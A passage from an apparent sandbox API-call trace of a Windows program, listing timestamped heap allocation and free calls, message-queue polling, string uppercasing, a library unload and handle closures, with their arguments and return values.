dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0190.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0190.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0190.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0190.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0190.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0190.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0190.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0190.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0190.150] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0190.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0190.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0190.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0190.150] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0190.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0190.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa490 [0190.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.150] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0190.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0190.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0190.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0190.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0190.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0190.151] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0190.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0190.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0190.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0190.151] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0190.151] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0190.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0190.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0190.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0190.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0190.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0190.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0190.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.152] FreeLibrary (hLibModule=0x74d40000) returned 1 [0190.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0190.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0190.152] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0190.152] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0190.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.152] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0190.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0190.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0190.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0190.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0190.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0190.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0190.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0190.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0190.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0190.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0190.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0190.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0190.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0190.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.154] CloseHandle (hObject=0x294) returned 1 [0190.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0190.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0190.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0190.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0190.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0190.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0190.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0190.155] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0190.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0190.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0190.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0190.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0190.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0190.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0190.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0190.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0190.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0190.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0190.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0190.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.156] CloseHandle (hObject=0x268) returned 1 [0190.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0190.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0190.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0190.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0190.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0190.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0190.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0190.159] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0190.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0190.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0190.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0190.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0190.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0190.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0190.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0190.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0190.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0190.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0190.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0190.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0190.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0190.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0190.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0190.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0190.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0190.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0190.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0190.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0190.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0190.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0190.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0190.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0190.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0190.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0190.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0190.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0190.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0190.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0190.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0190.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0190.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0190.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0190.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0190.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0190.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0190.162] HeapFree 